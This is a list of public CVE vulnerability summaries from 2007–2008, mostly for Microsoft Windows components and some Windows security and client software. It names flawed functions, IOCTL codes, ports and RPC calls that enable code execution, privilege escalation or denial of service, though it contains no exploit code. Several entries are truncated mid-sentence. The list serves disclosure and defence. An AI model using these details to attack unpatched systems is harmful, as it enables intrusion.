[CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2008-0639] Stack-based buffer overflow in the EnumPrinters function in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2, SP3, and SP4 for Windows allows remote attackers to execute arbitrary code via a crafted RPC request, aka Novell bug 353138, a different vulnerability than CVE-2006-5854. NOTE: this issue exists because of an incomplete fix for CVE-2007-6701. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6701] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP4 for Windows allow remote attackers to execute arbitrary code via long arguments to multiple unspecified RPC functions, aka Novell bug 287919, a different vulnerability than CVE-2007-2954. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4490] Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-4219] Integer overflow in the RPCFN_SYNC_TASK function in StRpcSrv.dll, as used by the ServerProtect service (SpntSvc.exe), in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allows remote attackers to execute arbitrary code via a certain integer field in a request packet to TCP port 5168, which triggers a heap-based buffer overflow. [CVE-2007-4218] Multiple buffer overflows in the ServerProtect service (SpntSvc.exe) in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allow remote attackers to execute arbitrary code via certain RPC requests to certain TCP ports that are processed by the (1) RPCFN_ENG_NewManualScan, (2) RPCFN_ENG_TimedNewManualScan, and (3) RPCFN_SetComputerName functions in (a) StRpcSrv.dll [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2954] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2 through SP4 for Windows allow remote attackers to execute arbitrary code via certain long arguments to the (1) RpcAddPrinterDriver, (2) RpcGetPrinterDriverDirectory, and other unspecified RPC requests, aka Novell bug 300870, a different vulnerability than CVE-2006-5854. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure Vulnerability." [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-1070] Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML 